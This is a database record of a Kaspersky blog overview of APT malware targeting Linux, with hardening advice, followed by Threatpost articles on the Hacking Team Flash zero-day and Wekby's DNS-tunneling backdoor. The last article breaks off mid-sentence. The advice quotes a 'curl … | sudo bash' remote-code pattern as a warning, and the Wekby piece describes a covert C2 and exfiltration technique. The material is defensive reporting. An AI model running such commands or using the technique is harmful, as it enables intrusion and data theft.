DATABASE RESOURCES PRICING ABOUT US

{"id": "SECURELIST:DA2F9F352C039B19A1FF5741AA1AA7C4", "type": "securelist", "bulletinFamily": "blog", "title": "An overview of targeted attacks and APTs on Linux", "description": "\n\nPerhaps unsurprisingly, a lot has been written about targeted attacks on Windows systems. Windows is, due to its popularity, the platform for which we discover most APT attack tools. At the same time, there&#x27;s a widely held opinion that Linux is a secure-by-default operating system that isn&#x27;t susceptible to malicious code. It&#x27;s certainly true that Linux hasn&#x27;t faced the deluge of viruses, worms and Trojans faced by those running Windows systems over the years. However, there is certainly malware for Linux \u2013 including PHP backdoors, rootkits and exploit code. Moreover, numbers can be misleading. The strategic importance of servers running Linux makes them an attractive target for attackers of all kinds. If an attacker is able to compromise a server running Linux, they not only gain access to data stored on the server but can also target endpoints connected to it running Windows or macOS \u2013 for example, through a drive-by download. Furthermore, Linux computers are more likely to be left unprotected, so that such a compromise might well go unnoticed. When the[ Heartbleed and Shellshock vulnerabilities](<https://www.kaspersky.com/blog/how-a-linux-bug-may-affect-windows-based-infrastructure/15017/>) were first reported in 2014, two major concerns were that compromised Linux servers could become an attacker&#x27;s gateway into a corporate network and could give an attacker access to sensitive corporate data.\n\nThe Global Research and Analysis Team (GReAT) at Kaspersky publishes regular summaries of advanced persistent threat (APT) activity, based on the threat intelligence research discussed in greater detail in our private APT reports. In this report, we focus on the targeting of Linux resources by APT threat actors.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact intelreports@kaspersky.com.\n\n## Barium\n\nWe first wrote about the [Winnti APT group (aka APT41 or Barium) in 2013](<https://securelist.com/winnti-more-than-just-a-game/37029/>), when they were targeting mostly gaming companies for direct financial profit. Meanwhile, they grew their operations, developed tons of new tools and went for much more complex targets. MESSAGETAP is Linux malware used by this group to selectively intercept SMS messages from the infrastructure of telecoms operators. According to FireEye, the group[ deployed this malware on SMS gateway systems as part of its operations to infiltrate ISPs and telecoms companies in order to build a surveillance grid](<https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html>).\n\nRecently, we discovered another suspected Barium/APT41 tool, written in the programming language Go (also known as Golang) that implements a dynamic, C2-controlled packet corruption/network attack tool for Linux machines. Although it&#x27;s not 100% clear if this is a tool developed for system administration tasks or if it is also part of the APT41 toolset, the fact that the functionality it offers can also be achieved through other system management tools suggests that its purpose may not be legitimate. Also, its name on disk is rather generic and is unrelated to its functionality, again suggesting that it is potentially a covert tool used for carrying out certain types of destructive attacks. More details about this tool can be found in our private report &quot;Suspected Barium network control tool in GO for Linux&quot;.\n\n## Cloud Snooper\n\nIn February 2020, Sophos published a report describing a set of malicious tools it attributes to a previously unknown threat actor called [Cloud Snooper](<https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-cloud-snooper-report.pdf>). The centerpiece is a server-oriented Linux kernel rootkit that hooks netfilter traffic control functions in order to enable firewall-traversing covert C2 (command-and-control) communications. We analyzed and described the rootkit&#x27;s userland companion backdoor, dubbed &#x27;Snoopy&#x27;, and were able to design detection and scanning methods to identify the rootkit at scale. We also discovered more samples, as well as targeted servers in Asia. We believe that this evolved toolset might have been in development since at least 2016.\n\n## Equation\n\n[We uncovered the Equation group in 2015](<https://securelist.com/?s=equation>). This is a highly sophisticated threat actor that has been engaged in multiple CNE (computer network exploitation) operations dating back to 2001, and perhaps as early as 1996. For many years this threat actor interacted or worked together with other powerful APT groups, for projects such as Stuxnet and Flame. The group has a powerful arsenal of implants. Among those we found were: &#x27;EQUATIONLASER&#x27;, &#x27;EQUATIONDRUG&#x27;, &#x27;DOUBLEFANTASY&#x27;, &#x27;TRIPLEFANTASY&#x27;, &#x27;FANNY&#x27; and &#x27;GRAYFISH&#x27;. The innovations of the Equation group aren&#x27;t limited to the Windows platform. The group&#x27;s POSIX-compliant codebase allows for parallel developments on other platforms. In 2015, we came by the early-stage DOUBLEFANTASY malware for Linux. This implant collects system information and credentials and provides generic access to an infected computer. Given the role this module plays in the infection lifecycle, it would suggest the presence of analogous later-stage, more sophisticated implants, although we weren&#x27;t able to find any.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/09130857/sl_overview_of_atps_02.png>)\n\n## HackingTeam\n\n[HackingTeam ](<https://securelist.com/spyware-hackingteam/37064/>)was an Italian information technology company that developed and sold intrusion and so called &quot;legal surveillance software&quot; to governments, law enforcement agencies and businesses around the world. Unfortunately for them, they were hacked and suffered a data breach in 2015, at the hands of the activist known as Phineas Phisher. The subsequent leak of 400GB of stolen company data, including source code and customer information, allowed these tools to be acquired, adapted and used by threat actors around the world, such as DancingSalome (aka Callisto). The leaked tools included a zero-day exploit for Adobe Flash (CVE-2015-5119) as well as sophisticated platforms capable of providing remote access, keylogging, general information recording and exfiltration, and perhaps most notably, the ability to retrieve Skype audio and video frames directly from memory, bypassing stream encryption. The RCS (Remote Control System) malware (aka Galileo, Da Vinci, Korablin, Morcut and Crisis) includes multiple components, including desktop agents for Windows, macOS and perhaps unsurprisingly\u2026 Linux.\n\n## Lazarus\n\nIn late 2018, we discovered a previously unknown malicious framework that we named [MATA](<https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/>) internally. This framework was used to target commercial companies in Korea, India, Germany and Poland. While we weren&#x27;t able to find code overlaps with any other known actor, the Kaspersky Threat Attribution engine showed code similarities with Manuscrypt, complex malware used by Lazarus (aka Hidden Cobra). This framework, as with earlier malware developed by Lazarus, included a Windows backdoor. However, we also found a Linux variant that we believe was designed for networking devices.\n\nIn June 2020, we analyzed new macOS samples linked to Lazarus [Operation ](<https://securelist.com/operation-applejeus-sequel/95596/>)[AppleJeus](<https://securelist.com/operation-applejeus-sequel/95596/>) and TangoDaiwbo campaigns, used in financial and espionage attacks. The samples had been uploaded to VirusTotal. The uploaded files also included a Linux malware variant that included similar functionality to the macOS TangoDaiwbo malware. These samples confirm a development that we had highlighted two years earlier \u2013 that the group was actively developing non-Windows malware.\n\n## Sofacy\n\n[Sofacy](<https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/>) (aka APT28, Fancy Bear, STRONTIUM, Sednit and Tsar Team) is a highly active and prolific APT threat actor. From its high-volume zero-day deployment to its innovative, broad malware set, Sofacy is one of the top groups that we monitor. Among the tools in the group&#x27;s arsenal is SPLM (also known as CHOPSTICK and XAgent), a second-stage tool used selectively against targets around the world. Over the years, Sofacy has developed modules for several platforms, including, in 2016, modules for Linux, detected as &#x27;Fysbis&#x27;. The consistent artefacts seen over the years and across Windows, macOS, iOS and Linux suggests that the same developers, or a small core team, is modifying and maintaining the code.\n\n## The Dukes\n\nThe [Dukes is a sophisticated threat actor that was first documented by us in 2013](<https://securelist.com/the-miniduke-mystery-pdf-0-day-government-spy-assembler-0x29a-micro-backdoor/31112/>), but whose tools have been used in attacks dating back to 2008. The group is responsible for attacks against targets in Chechnya, Ukraine, Georgia, as well as western governments and NGOs, NATO and individuals \u2013 the group is thought to be behind the hack of the Democratic National Congress in 2016. The Dukes&#x27; toolset includes a comprehensive set of malware implementing similar functionality but coded in several different programming languages. The group&#x27;s malware and campaigns include PinchDuke, GeminiDuke, CosmicDuke, MiniDuke, CozyDuke, OnionDuke, SeaDuke, HammerDuke and CloudDuke. At least one of these, SeaDuke, includes a Linux variant.\n\n## The Lamberts\n\nThe Lamberts is a highly sophisticated threat actor group which is known to possess a huge malware arsenal, including passive, network-driven backdoors, several generations of modular backdoors, harvesting tools and wipers for carrying out destructive attacks. We created a color scheme to distinguish the various tools and implants used against different victims around the world.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/09131046/sl_overview_of_atps_03.png>)\n\n**_Lamberts discovery timeline_**\n\nIn 2017, we published an[ overview of the Lamberts family](<https://securelist.com/unraveling-the-lamberts-toolkit/77990/>); and further updates (GoldLambert, SilverLambert, RedLambert, BrownLambert) are available to customers of our[ threat intelligence reports](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>). The focus of the various Lamberts variants is definitely Windows. Nevertheless, signatures that we created for Green Lambert for Windows also triggered on a macOS variant of Green Lambert that was functionally similar to the Windows version. In addition, we also identified samples of the SilverLambert backdoor compiled for both Windows and Linux.\n\n## Tsunami backdoor\n\nTsunami (aka Kaiten) is a UNIX backdoor used by multiple threat actors since it was first seen in the wild in 2002. The source code was made public some years ago; and there are now more than 70 variants. The source code compiles smoothly on a wide range of embedded devices; and there are versions for ARM, MIPS, Sparc and Cisco 4500/PowerPC. Tsunami remains a threat for Linux-based routers, DVRs and the increasing number of IoT (internet of things) devices. In 2016, a variant of Tsunami was used in the[ Linux Mint hack](<https://securelist.com/beware-of-backdoored-linux-mint-isos/73893/>), where an unknown threat actor compromised the Linux Mint distribution ISOs to include a backdoor. We also observed the use of the Tsunami backdoor to surgically target a number of cryptocurrency users on Linux.\n\n## Turla\n\nTurla (aka Uroboros, Venomous Bear and Waterbug) is a prolific Russian-speaking group known for its covert exfiltration tactics such as the use of[ hijacked satellite connections](<https://securelist.com/satellite-turla-apt-command-and-control-in-the-sky/72081/>),[ water-holing of government websites](<https://securelist.com/the-epic-turla-operation/65545/>), covert channel backdoors, rootkits and[ deception tactics](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07184135/Bartholomew-GuerreroSaade-VB2016.pdf>). This threat actor, like other APT groups, has made significant changes to its toolset over the years. Until 2014, every malware sample used by Turla that we had seen was designed for 32- or 64-bit versions of Windows.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/09131207/sl_overview_of_atps_04.jpg>)\n\nThen in December 2014, we published our report on [Penguin Turla](<https://securelist.com/the-penquin-turla-2/67962/>), a Linux component in the Turla arsenal. This is a stealth backdoor that didn&#x27;t require elevated privileges, i.e. administrator or root rights. Even if someone with limited access to the system launches it, the backdoor can intercept incoming packets and run commands from the attackers on the system while maintaining stealth. It is also rather hard to uncover, so if it&#x27;s installed on a compromised server, it could sit there unnoticed for a long time. Further research on Penguin Turla revealed that[ its roots stretch back to the Moonlight Maze operation in the mid-1990s](<https://securelist.com/penquins-moonlit-maze/77883/>). In May this year, researchers from Leonardo published a report about [Penguin_x64](<https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf/541d279e-a827-38b4-99e8-3c23553cd66a>), a previously undocumented variant of the Penguin Turla Linux backdoor. Based on this report, we generated network probes that detect Penquin_x64 infected hosts at scale, allowing us to discover a couple dozen infected servers in Europe and the US, as recent as July 2020. We believe that, following public documentation of GNU/Linux tools, Turla may have been repurposing Penguin to conduct operations other than traditional intelligence gathering.\n\n## Two-Sail Junk\n\nIn January 2020, a watering hole was discovered that utilized a full remote iOS exploit chain to deploy a feature-rich implant named LightSpy. The site appears to have been designed to target users in Hong Kong, based on the content of the landing page. For the time being, until we can link the campaign to a known group, we have given the name Two-Sail Junk to the threat actor behind this implant. However, while[ our public report](<https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/>) focused on the iOS implant, the project is broader than previously thought, supporting an Android implant, and probably supporting implants for Windows, Linux and MacOS.\n\n## WellMess\n\nIn March 2020, we began to actively track new C2 servers associated with malware commonly referred to as WellMess, indicating a potentially massive new wave of activity. This malware was[ initially documented by JPCERT in July 2018](<https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html>) and has been sporadically active since then. There were rumors that hint at a possible connection with CozyDuke (aka APT29), along with speculation that the current activity was focused on the healthcare industry, although we were unable to verify either claim. WellMess is a Remote Access Trojan, written in .NET and Go (Golang), cross-compiled to be compatible with both Windows and Linux.\n\n## WildNeutron\n\nWe [first published about WildNeutron in 2015](<https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/>), together with our colleagues from Symantec, who call it Morpho or Butterfly. This group, which rose to prominence with their 2012-2013 attacks on Twitter, Microsoft, Apple and Facebook, are one of the most elusive, mysterious and dynamic we have seen. Their arsenal included many interesting and innovative tools, such as LSA backdoors or IIS plugins, coupled with both zero-day-based and physical deployment. Unsurprisingly, in several known attacks WildNeutron used a custom Linux backdoor as well.\n\n## Zebrocy\n\nZebrocy is custom malware that we have been tracking since 2015. The group using this malware started as a subset of Sofacy, but also has similarities and[ overlaps with other APT groups](<https://securelist.com/zebrocys-multilanguage-malware-salad/90680/>). The group has developed malware in several languages, including Delphi, AutoIT, .NET, C#, PowerShell and Go. Zebrocy has mainly targeted Central Asian government-related organizations, both in-country and in remote locations. The group makes extensive use of spear phishing to compromise Windows endpoints. However, its backdoors are configured to communicate directly with IP-assigned web server hosts over port 80; and[ the group seems to favor Linux for this part of its infrastructure](<https://securelist.com/a-zebrocy-go-downloader/89419/>) \u2013 specifically, Apache 2.4.10 running on Debian Linux.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/09131351/sl_overview_of_atps_05.png>)\n\n## Recommendations for protecting Linux systems\n\nOne of the main reasons that Linux systems go unprotected is a false sense of security from using Linux instead of the far more popular (and more targeted) Windows. Nevertheless, we hope all the aforementioned points are convincing enough for you to start securing your Linux-based machines in a serious way.\n\nThe very first recommendation is to **maintain a list of trusted sources** of your software. Think about this in the same way as the recommended approach to Android or iOS apps \u2013 only installing applications from official repositories. In the Linux world we enjoy more freedom: for example, even if you are using Ubuntu, you&#x27;re not restricted only to Canonical&#x27;s own repository. Any .DEB file, or even application source code from GitHub, is at your service. But please choose these sources wisely. Don&#x27;t just blindly follow instructions like &quot;Run this script from our server to install&quot;; or &quot;curl https://install-url | sudo bash&quot; \u2013 which is a security nightmare.\n\nPlease also be mindful of the **secure way to get applications** from these trusted repositories. Your channels to update the apps have to be encrypted using HTTPS or SSH protocols. Besides your trust in software sources and its delivery channel, it&#x27;s critical for **updates to arrive in a timely fashion**. Most modern Linux flavors are able to do this for you, but a simple cron script would help you to stay more protected and to get all the patches as soon as they are released by developers.\n\nThe next thing we would recommend is checking network-related settings. With commands like &quot;netstat -a&quot; you could **filter out all unnecessary opened ports** on your host. Please avoid network applications you really don&#x27;t need or don&#x27;t use to minimize your network footprint. Also, it would be strongly recommended to **properly set up the firewall** from your Linux distributive, to filter traffic and store the host&#x27;s network activity. It&#x27;s also a very good idea not to go online directly, but through NAT.\n\nTo continue with the network-related security rules, we recommend **protecting your locally stored SSH keys** (used for your network services) using passwords at least. In more &quot;paranoid&quot; mode you could even **store the keys on external protected storage**, like tokens from any trusted vendor. On the server side of connections, nowadays it&#x27;s not that hard to **set up multi-factor authentication for SSH sessions**, like the messages to your phone or other mechanisms such as authenticator apps.\n\nSo far, our recommendations have covered software sources, application delivery channel, avoiding unnecessary network footprint and protection of encryption keys. One more idea we recommend for monitoring threats you couldn&#x27;t find at the filesystem level is to **keep and analyze the network activity logs**. You could install and use an out-of-band network tap to independently monitor and analyze the network communications of your Linux systems.\n\nAs part of your threat model, you need to consider the possibility that, despite all the aforementioned measures, attackers can compromise your protection. Think about the next protection step in terms of an attacker&#x27;s persistence in the system. They will probably make changes to be able to start their Trojan automatically after the system reboots. So, you need to **regularly monitor the main configuration files as well as the integrity of system binaries**, just in case of file viruses. The logs mentioned above for monitoring network communication, is fully applicable here: **the Linux auditing system collects system calls and file access records**. Additional daemons such as &quot;osquery&quot; can be used for the same task. . Any suspicious files, URLs, and IP addresses can be checked at [Kaspersky Threat Intelligence Portal](<https://opentip.kaspersky.com/>).\n\nPhysical security of devices is also important. It doesn&#x27;t matter how much attention you pay to network and system level hardening if your laptop ends up in an attacker&#x27;s hands and you haven&#x27;t taken steps to protect it from this attack vector. You should consider **full disk encryption and safe boot mechanisms** for physical security. A more spy-like approach would be to place tamper-evident security tape on your most critical hardware.\n\nDedicated [solution](<https://www.kaspersky.com/enterprise-security/endpoint>) with Linux security can simplify the protection task: web threat protection detects malicious and phishing websites; network threat protection detects network attacks in incoming traffic; behavior analysis detects malicious activity, while device control allows management of connected devices and access to them.\n\nOur final recommendation relates to Docker. This is not a theoretical threat: infection of containers is a [very real issue](<https://www.zdnet.com/article/new-linux-malware-uses-dogecoin-api-to-find-c-c-server-addresses/?amp=1>). **Containerization doesn&#x27;t provide security by itself**. Some containers are quite isolated from the host, but not all \u2013 **network and file system interfaces exist** in them and in most cases there are bridges between physical and containerized worlds.\n\nTherefore, you can use security solution that allows to add security into development process. [Kaspersky Hybrid Cloud Security](<https://www.kaspersky.com/enterprise-security/devops-security>) includes integration with CI/CD platforms, such as Jenkins, through a script to scan Docker images for malicious elements at different stages.\n\nTo prevent supply-chain attacks, On-Access Scanning (OAS) and On-Demand Scanning (ODS) of containers, images, and local and remote repositories can be used. Namespace monitoring, flexible mask-based scan scope control and the ability to scan different layers of containers help to enforce secure development best practices.\n\nWe have broken down this list of recommendations into logical sections. Please bear in mind that, besides applying all the measures we have mentioned, you should also audit and check all the generated logs and any other messages regularly. Otherwise you could miss signs of intrusion. A final idea, for security enthusiasts, is to adopt active measures \u2013 to provide system penetration testing from time to time.\n\n### Summary of recommendations:\n\n * Maintain a list of trusted software sources, avoid using unencrypted update channels.\n * Do not run binaries and scripts from untrusted sources. A widely advertised way to install programs with commands like &quot;curl [https://install-url](<http://install-url>) | sudo bash&quot; is a security nightmare.\n * Make sure your update procedure is effective. Set up automatic security updates.\n * Spend time to set up your firewall properly: make sure it logs network activity, block all ports you don&#x27;t use, minimize your network footprint.\n * Use key-based SSH authentication, protect keys with passwords.\n * Use 2FA and store sensitive keys on external token devices (e.g. Yubikey).\n * Use an out-of-band network tap to independently monitor and analyze network communications of your Linux systems.\n * Maintain system executable file integrity. Review configuration file changes regularly.\n * Be prepared for insider/physical attacks: use full disk encryption, trusted/safe boot and put tamper-evident security tape on your critical hardware.\n * Audit the system, check logs for indicators of attacks.\n * Run penetration tests on your Linux setup.\n * Use a dedicated security solution for Linux with web and network protection, as well as features for DevOps protection.", "published": "2020-09-10T10:00:39", "modified": "2020-09-10T10:00:39", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", "reporter": "GReAT", "references": [], "cvelist": ["CVE-2015-5119"], "lastseen": "2020-09-12T21:51:55", "viewCount": 232, "enchantments": {"dependencies": {"references": [{"type": "archlinux", "idList": ["ASA-201507-7"]}, {"type": "attackerkb", "idList": ["AKB:47269E9B-0CEB-46D4-BD88-640970C28E72", "AKB:BDC2BC7E-5904-4C44-80ED-E26E3BD1A1A6"]}, {"type": "canvas", "idList": ["ADOBE_FLASH_VALUEOF"]}, {"type": "cert", "idList": ["VU:561288"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2015-0806"]}, {"type": "cisa", "idList": ["CISA:2A8422190E3030D1FA551BC2C97714D9"]}, {"type": "cve", "idList": ["CVE-2015-5119"]}, {"type": "fireeye", "idList": ["FIREEYE:20039B16BD5AC80305D58731B238119A", "FIREEYE:C106464BCA41AB0D5AF6965D9907C8C3", "FIREEYE:C1FB4B9FAC84D1B9FD74A7D5A588D1D2"]}, {"type": "freebsd", "idList": ["348BFA69-25A2-11E5-ADE1-0011D823EEBD"]}, {"type": "gentoo", "idList": ["GLSA-201507-13"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:58B8640C3716E8B2D608FF8EDD780806"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:FD11436A13A56E314FE7438DEDAF9FBA"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/BROWSER/ADOBE_FLASH_HACKING_TEAM_UAF", "MSF:EXPLOIT/MULTI/BROWSER/ADOBE_FLASH_HACKING_TEAM_UAF/", "MSF:ILITIES/ADOBE-FLASH-APSB15-16-CVE-2015-5119/"]}, {"type": "mssecure", "idList": ["MSSECURE:A133B2DDF50F8BE904591C1BB592991A"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994516"]}, {"type": "nessus", "idList": ["8821.PRM", "8858.PRM", "8881.PASL", "8886.PRM", "ADOBE_AIR_APSB15-16.NASL", "FLASH_PLAYER_APSB15-16.NASL", "FREEBSD_PKG_348BFA6925A211E5ADE10011D823EEBD.NASL", "GENTOO_GLSA-201507-13.NASL", "GOOGLE_CHROME_43_0_2357_132.NASL", "MACOSX_ADOBE_AIR_APSB15-16.NASL", "MACOSX_FLASH_PLAYER_APSB15-16.NASL", "MACOSX_GOOGLE_CHROME_43_0_2357_132.NASL", "OPENSUSE-2015-473.NASL", "REDHAT-RHSA-2015-1214.NASL", "SMB_KB3065823.NASL", "SUSE_SU-2015-1211-1.NASL", "SUSE_SU-2015-1214-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310121394", "OPENVAS:1361412562310130105", "OPENVAS:1361412562310805902", "OPENVAS:1361412562310805903", "OPENVAS:1361412562310805904", "OPENVAS:1361412562310805911", "OPENVAS:1361412562310805912", "OPENVAS:1361412562310850845"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:132600"]}, {"type": "redhat", "idList": ["RHSA-2015:1214"]}, {"type": "securelist", "idList": ["SECURELIST:56D279C45B0C4431FBA76FDF2EC365A1", "SECURELIST:75F0B75D28318C525992E42495D8C5EE"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14591"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2015:1207-1", "OPENSUSE-SU-2015:1210-1", "SUSE-SU-2015:1211-1", "SUSE-SU-2015:1214-1"]}, {"type": "symantec", "idList": ["SMNTC-75568"]}, {"type": "thn", "idList": ["THN:81AF218D527E626B7FE15454B68E5FF0", "THN:F6B79957FA6EFD8F9C60F4A8646CCE04"]}, {"type": "threatpost", "idList": ["THREATPOST:10AFDF2569BF60140B11198E0B2082D8", "THREATPOST:23B92BF326746339F6B36D64AEB2D5F6", "THREATPOST:30E23091BD920CFE6F579C918001D85D", "THREATPOST:342B067585A04A2E2EA010EA2C33DC1B", "THREATPOST:36DC9B1F1EFE6F30B37A56180A6A6163", "THREATPOST:521E37B95AC41E0A1D35ADB09B1A4835", "THREATPOST:644EA98A53DF0E53AF5BDAC1607B06D2", "THREATPOST:7E6EDF53838EEFD3BEAC32130CE58C38", "THREATPOST:944377914FB1A58CB3F9F096F78260E0", "THREATPOST:BAC3CD99B74F1D6CD22A123ED632AA3F"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-5119"]}, {"type": "zdt", "idList": ["1337DAY-ID-23842"]}]}, "score": {"value": 7.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "canvas", "idList": ["ADOBE_FLASH_VALUEOF"]}, {"type": "cert", "idList": ["VU:561288"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2015-0806"]}, {"type": "cve", "idList": ["CVE-2015-5119"]}, {"type": "fireeye", "idList": ["FIREEYE:C106464BCA41AB0D5AF6965D9907C8C3"]}, {"type": "gentoo", "idList": ["GLSA-201507-13"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:58B8640C3716E8B2D608FF8EDD780806"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:FD11436A13A56E314FE7438DEDAF9FBA"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/ADOBE-FLASH-APSB15-16-CVE-2015-5119/"]}, {"type": "nessus", "idList": ["GOOGLE_CHROME_43_0_2357_132.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805911"]}, {"type": "securelist", "idList": ["SECURELIST:75F0B75D28318C525992E42495D8C5EE"]}, {"type": "suse", "idList": ["SUSE-SU-2015:1214-1"]}, {"type": "thn", "idList": ["THN:81AF218D527E626B7FE15454B68E5FF0"]}, {"type": "threatpost", "idList": ["THREATPOST:23B92BF326746339F6B36D64AEB2D5F6", "THREATPOST:342B067585A04A2E2EA010EA2C33DC1B"]}]}, "exploitation": null, "vulnersScore": 7.1}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}

{"threatpost": [{"lastseen": "2018-10-06T22:56:36", "description": "Adobe tomorrow is expected to release an updated version of Flash Player that will patch a zero-day vulnerability uncovered among the 400 GB of data stolen from Hacking Team.\n\nThe controversial Italian intrusion and surveillance software vendor was breached and on Sunday, private documents, including internal emails and customer invoices, were leaked. The published loot shows sales to oppressive governments, a practice the company\u2019s marketing material says it did not engage in.\n\nAdobe\u2019s [advisory](<https://helpx.adobe.com/security/products/flash-player/apsa15-03.html>), published a short time ago, is short on details other than to say that the vulnerability has likely been publicly exploited. The vulnerability, CVE-2015-5119, affects Flash Player version 18.0.0.194 and earlier for Windows, Macintosh and Linux systems.\n\n\u201cSuccessful exploitation could cause a crash and potentially allow an attacker to take control of the affected system,\u201d said the Adobe advisory. The vulnerability was reported to Adobe by researcher Morgan Marquis-Boire and Google Project Zero. Marquis-Boire and Adobe confirmed to Threatpost that the patch will address the Hacking Team zero day.\n\nAs researchers comb through the hacked documents and data, there are likely to be other unreported flaws in popular software. The Grugq, a security researcher based in Bangkok, said on his Twitter feed that a Windows zero-day is also documented.\n\n> All that fear about 0day and HackingTeam had only 2 that are relevant (flash + win32k).\n> \n> \u2014 the grugq (@thegrugq) [July 7, 2015](<https://twitter.com/thegrugq/status/618293343819165696>)\n\nHacking Team plays in a market heavily scrutinized by security and privacy experts who say that oppressive governments such as Sudan and Ethiopia\u2014both Hacking Team customers\u2014can abuse the software to keep tabs on citizens and suppress the work of activists, journalists and others. Citizen Lab at the University of Toronto published an open [letter](<https://citizenlab.org/2015/03/open-letter-hacking-team-march-2015/>) earlier this year to Hacking Team executives asking why Ethiopian journalists were targeted by one of their customers, a supposed violation of the Milan-based company\u2019s policy.\n\nSince the Hacking Team breach was disclosed on Sunday afternoon, the story has moved quickly as more details are disclosed about customers and internal operations; the highest revenue-producing countries for Hacking Team are Mexico, Italy and Morocco. The U.S. is also listed among its customers, with the Drug Enforcement Agency and FBI buying spyware from the firm.\n\nIt was also disclosed that Hacking Team had an [enterprise developer certificate from Apple](<https://threatpost.com/hacking-team-couldnt-hack-your-iphone/113636>), allowing it to build sign OS X and iOS applications and distribute them internally. Apple has since revoked Hacking Team\u2019s certificate.\n\nThe EU Parliament, meanwhile, today asked the European Commission whether Hacking Team\u2019s sales to certain countries is a [violation of EU sanctions](<https://threatpost.com/eu-lawmaker-wants-answers-on-hacking-team-sales-to-sanctioned-countries/113638>). Marietje Schaake, a Dutch member of the European Union Parliament, has been outspoken about the use of surveillance programs by sanctioned nations and likened companies such as Hacking Team to modern-day arms dealers.\n", "cvss3": {}, "published": "2015-07-07T15:46:59", "type": "threatpost", "title": "Adobe to Patch Hacking Team Flash Zero Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-5119"], "modified": "2015-07-07T19:46:59", "id": "THREATPOST:36DC9B1F1EFE6F30B37A56180A6A6163", "href": "https://threatpost.com/adobe-to-patch-hacking-team-zero-day-in-flash/113658/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:17", "description": "Palo Alto Networks is reporting a shift in malware tactics used by the APT group Wekby that has added a rare but effective new tool to its bag of tricks. The security [firm reported on Tuesday](<http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/>) that over the past week, Wekby attackers are turning to the technique known as DNS tunneling in lieu of more conventional HTTP delivery of command and controls for remote access control of infected computer networks.\n\nResearchers discovered the change in strategy while monitoring an undisclosed U.S.-based high-tech firm targeted by the gang. Palo Alto Networks call the DNS tunneling malware pisloader, adding it has existed for some time but is seldom used. The use of the DNS-based attacks differs from the Wekby\u2019s go-to malware HTTPBrowser, which is still used widely by the group, according to Ryan Olson, researcher at Palo Alto Networks Unit 42 team.\n\n\u201cWe found it really interesting that this pisloader malware technique not only was being used to exfiltration data but also as a command and control mechanism,\u201d Olson told Threatpost. The malware is uncommon because of its limited use case for attacks and that it requires above average technical sophistication by the perpetrator to configure. Domains used in the Wekby attack outlined by Palo Alto Networks include globalprint-us[.]com, ns1.logitech-usa[.]com and intranetwabcam[.]com.\n\nDNS tunneling takes advantage of the TXT transport layer within the DNS protocol used by top and second level domain name system servers. A maximum of 255 bytes of data can be transported via DNS request between endpoint and a DNS server using the TXT layer. For Wekby attackers that have already gained a foothold on targeted systems, the DNS tunneling of commands and DNS tunneling used to remove of data is extremely slow, but well suited for long term APT campaigns.\n\nIn the case of pisloader, attackers would use their own DNS server that they controlled to send and receive C2 commands to infected computers. Embedded in the DNS TXT layer of the call and responses between infected client and Wekby\u2019s DNS server would be a mix of five instructions including; collect victim system information, list drives on victim machine, list file information for provided directory, upload a file to the victim machine, and spawn a command shell.\n\nTo obfuscate those commands, Wekby attackers use base32 encoding on the DNS TXT layer making it appear that the DNS TXT was simply garbage strings of DNS metadata.\n\nFor attackers, DNS tunneling is a double-edged sword, Olson said. \u201cPisloader is extremely hard to discover if you\u2019re not already looking for it. But with a limit of 255 bytes per message uploading anything could take days to weeks without sounding alarms,\u201d he said. But because pisloader was able to skirt many security products that don\u2019t inspect DNS traffic properly, attackers are willing to sacrifice speed for stealth, Olson said. For those reasons the use of pisloader is extremely rare, even among Wekby gangs. In fact, the use of DNS as a C2 protocol has never been widely adopted by APT gangs. Olson said, there are very few malware families with similar DNS tunneling attributes such a [FrameworkPOS](<https://blog.gdatasoftware.com/2014/10/23942-new-frameworkpos-variant-exfiltrates-data-via-dns-requests>), [C3PRO-RACCOON](<https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf>) and [FeederBot](<http://blog.cj2s.de/archives/28-Feederbot-a-bot-using-DNS-as-carrier-for-its-CC.html>).\n\nPalo Alto Networks said it was able to link the 